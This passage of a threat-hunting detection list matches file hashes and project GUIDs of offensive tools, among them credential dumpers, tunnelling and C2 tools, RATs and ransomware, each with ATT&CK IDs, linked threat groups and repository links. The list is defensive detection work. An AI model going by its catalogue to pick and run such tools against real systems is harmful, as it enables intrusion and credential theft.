LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29367" "*7936b47a27c7e2b5f41d8179581d712703ee286faefc2b4efa33bd6fa0a9aab1*",".{0,1000}7936b47a27c7e2b5f41d8179581d712703ee286faefc2b4efa33bd6fa0a9aab1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29369" "*793bb27999fa08b9b9f9e58027be7444bbaa2d71786baa37bd9955a645fa7d21*",".{0,1000}793bb27999fa08b9b9f9e58027be7444bbaa2d71786baa37bd9955a645fa7d21.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - 
Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","29371" "*793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575*",".{0,1000}793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","29373" "*7943C5FF-C219-4E0B-992E-0ECDEB2681F3*",".{0,1000}7943C5FF\-C219\-4E0B\-992E\-0ECDEB2681F3.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","Black Basta","Credential Access","https://github.com/leftp/BackupCreds","1","0","#GUIDproject","N/A","9","1","57","10","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z","29374" "*79520C3A-4931-46EB-92D7-334DA7FC9013*",".{0,1000}79520C3A\-4931\-46EB\-92D7\-334DA7FC9013.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","#GUIDproject","N/A","10","1","N/A","N/A","N/A","N/A","29377" "*7952f508ed86aab60e0ffa5ac2a0af0e76eebc9d840cd3cad351adcb64adccc3*",".{0,1000}7952f508ed86aab60e0ffa5ac2a0af0e76eebc9d840cd3cad351adcb64adccc3.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29378" "*79565b23f130ffaeb3f02f6775acf74a3368368b010ed56d3b49bac6485b3b74*",".{0,1000}79565b23f130ffaeb3f02f6775acf74a3368368b010ed56d3b49bac6485b3b74.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29379" "*795845daafefd3f3b79a5cd599e45605aed74244de4a6d17eb1ccfb3568f938e*",".{0,1000}795845daafefd3f3b79a5cd599e45605aed74244de4a6d17eb1ccfb3568f938e.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29382" "*79584f6bf2e53a5d8fef078289568b57867d43a11a86cc98fcfe07a013f78c94*",".{0,1000}79584f6bf2e53a5d8fef078289568b57867d43a11a86cc98fcfe07a013f78c94.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29383" 
"*795bdabf997860026137d283b1536fb91ec13dba6eeea0b3d034a030e801efe7*",".{0,1000}795bdabf997860026137d283b1536fb91ec13dba6eeea0b3d034a030e801efe7.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29384" "*795f2e9d0314898ba5a63bd1fdc5fa18*",".{0,1000}795f2e9d0314898ba5a63bd1fdc5fa18.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","29386" "*796011ef9dd06969ac3d8a663e4cbc8ceeda566dc151181445284ab44d6eb1b4*",".{0,1000}796011ef9dd06969ac3d8a663e4cbc8ceeda566dc151181445284ab44d6eb1b4.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","29387" 
"*796f70f040f3edcf0b48a711ad9ebce5a1f1dbbad15195d577e9c19c04fd0b88*",".{0,1000}796f70f040f3edcf0b48a711ad9ebce5a1f1dbbad15195d577e9c19c04fd0b88.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","29391" "*796f70f7e01257c5b79e398851c836e915f6518e1e3ecd07bcd29233cf78f13d*",".{0,1000}796f70f7e01257c5b79e398851c836e915f6518e1e3ecd07bcd29233cf78f13d.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","29392" "*7971e955309e5158aa13fe774596224af88ae64e53f09bd2ffb863acbf88864a*",".{0,1000}7971e955309e5158aa13fe774596224af88ae64e53f09bd2ffb863acbf88864a.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29393" 
"*797b944371e918b47143d0e4282033e057b7accf981ee5461652d659cccffd4e*",".{0,1000}797b944371e918b47143d0e4282033e057b7accf981ee5461652d659cccffd4e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29394" "*79806039befe2c12c794ab8951aa17edf316843a8b968d22bd7abc9937252014*",".{0,1000}79806039befe2c12c794ab8951aa17edf316843a8b968d22bd7abc9937252014.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","#filehash","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","29395" "*79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805*",".{0,1000}79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","29396" "*7985cfa2c992f22675afceef7bc9cf8e0d1fda7ce07a46eed77e390cc3157243*",".{0,1000}7985cfa2c992f22675afceef7bc9cf8e0d1fda7ce07a46eed77e390cc3157243.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","29398" 
"*79867cf5f18de28036b96ac1beaa8aaa43c3fb44676d25173c592c16312ca9c7*",".{0,1000}79867cf5f18de28036b96ac1beaa8aaa43c3fb44676d25173c592c16312ca9c7.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29399" "*798ccfbf2e5c14077023d9236363c6e6ebf3bc6b28b551c01b00e272863bdcc7*",".{0,1000}798ccfbf2e5c14077023d9236363c6e6ebf3bc6b28b551c01b00e272863bdcc7.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29400" "*798f7f112a49afffac6f7290e24812e6a473d10b7bbb8dca9f32e5af074abaf1*",".{0,1000}798f7f112a49afffac6f7290e24812e6a473d10b7bbb8dca9f32e5af074abaf1.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29401" "*7992bdccdeafe04123c097c807381ea987d778b6c8d527937f3eb9146ae39a54*",".{0,1000}7992bdccdeafe04123c097c807381ea987d778b6c8d527937f3eb9146ae39a54.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29402" "*79a0b0ac70e2c7315bd2a6e100737159b71da490aad293d6583e995a6a7244aa*",".{0,1000}79a0b0ac70e2c7315bd2a6e100737159b71da490aad293d6583e995a6a7244aa.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29403" "*79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104*",".{0,1000}79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - 
T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","#filehash","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","29404" "*79ba1aa3b1b83aeb4db3fcf649b4acffce02a559a39b10905b4eb6676a646538*",".{0,1000}79ba1aa3b1b83aeb4db3fcf649b4acffce02a559a39b10905b4eb6676a646538.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","Dispossessor - Scattered Spider*","C2","https://github.com/b23r0/rsocx","1","0","#filehash","N/A","10","10","381","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z","29409" "*79c1d4ab8f425095d2d9f2a18a0cab08d31b686b149fba3db24a13e2bc7299ee*",".{0,1000}79c1d4ab8f425095d2d9f2a18a0cab08d31b686b149fba3db24a13e2bc7299ee.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#filehash","N/A","10","8","N/A","N/A","N/A","N/A","29410" "*79c64d376c00d7ccc3d946771a009fdcc9da4f066c9457805a19d1f804597466*",".{0,1000}79c64d376c00d7ccc3d946771a009fdcc9da4f066c9457805a19d1f804597466.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","29411" "*79C9BBA3-A0EA-431C-866C-77004802D8A0*",".{0,1000}79C9BBA3\-A0EA\-431C\-866C\-77004802D8A0.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - 
TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#GUIDproject","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","29413" "*79C9BBA3-A0EA-431C-866C-77004802D8A0*",".{0,1000}79C9BBA3\-A0EA\-431C\-866C\-77004802D8A0.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","29414" "*79d297c97d9217e752410cfcc43ca6eb8b67755bc396d37ae4fe7c2348413bba*",".{0,1000}79d297c97d9217e752410cfcc43ca6eb8b67755bc396d37ae4fe7c2348413bba.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29415" "*79D3788D-683D-4799-94B7-00360F08145B*",".{0,1000}79D3788D\-683D\-4799\-94B7\-00360F08145B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","29416" "*79d864217d3db0f218b2a638648d1a86b5b6ef2d4fab9d09cd50460685f1a2a7*",".{0,1000}79d864217d3db0f218b2a638648d1a86b5b6ef2d4fab9d09cd50460685f1a2a7.{0,1000}","offensive_tool_keyword","Dispossessor","hashes of AV removing scripts tools and notes from the Dispossessor 
ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","4","8","N/A","N/A","N/A","N/A","29418" "*79e31f821d147c4db713a2a7381810a2588105f592e22d21872b38be0b0aa758*",".{0,1000}79e31f821d147c4db713a2a7381810a2588105f592e22d21872b38be0b0aa758.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29419" "*79e94689174f714187930b4003d27a11e7824508e295849ddda8dd94adbf994c*",".{0,1000}79e94689174f714187930b4003d27a11e7824508e295849ddda8dd94adbf994c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29420" "*79ef2d4f2ad91311f14fc200acb71e78a47eb9a4f23e776649fb1b0b06c69dd2*",".{0,1000}79ef2d4f2ad91311f14fc200acb71e78a47eb9a4f23e776649fb1b0b06c69dd2.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","29421" "*79efd1cb38bfa9ea0c22059d17bc11498bf0f181d5dba1726fa526a500865ec8*",".{0,1000}79efd1cb38bfa9ea0c22059d17bc11498bf0f181d5dba1726fa526a500865ec8.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","29422" "*79f190a51af8a463f13ddd5a76947cf7ba2adfb8e231b37c5e0968602217a62b*",".{0,1000}79f190a51af8a463f13ddd5a76947cf7ba2adfb8e231b37c5e0968602217a62b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29423" "*79f30574ad34a49673425cb37cd038106cc9fb49615cd6a2d05986e0c7c010e2*",".{0,1000}79f30574ad34a49673425cb37cd038106cc9fb49615cd6a2d05986e0c7c010e2.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","29424" 
"*79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850*",".{0,1000}79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29426" "*79F54747-048D-4FD6-AEF4-7B098F923FD8*",".{0,1000}79F54747\-048D\-4FD6\-AEF4\-7B098F923FD8.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","29427" "*79f5bb07a32da20893b7d1755cee8b5f8f637d5712eac1788b796eda90e75de2*",".{0,1000}79f5bb07a32da20893b7d1755cee8b5f8f637d5712eac1788b796eda90e75de2.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29428" 
"*79f9d6b67d810d18cc0bd093578cb11d26ce43801eb6aedb2933336380ed6452*",".{0,1000}79f9d6b67d810d18cc0bd093578cb11d26ce43801eb6aedb2933336380ed6452.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29430" "*7a0abdd123fe8f650f37557666688ee7c050c94d8271462de50b5cb1e9b58246*",".{0,1000}7a0abdd123fe8f650f37557666688ee7c050c94d8271462de50b5cb1e9b58246.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","#filehash","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","29432" "*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29433" "*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29434" 
"*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29435" "*7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1*",".{0,1000}7a0bbc4b806f3ea1dd127b03a2ec78d1e6abcb24c1d1aa1dd19eee4d9a3589f1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29436" "*7a0ea2754fa07652dcd87ccba97c9e43ecdc035dc2d3f94e148fea04b6bdea0a*",".{0,1000}7a0ea2754fa07652dcd87ccba97c9e43ecdc035dc2d3f94e148fea04b6bdea0a.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","29439" 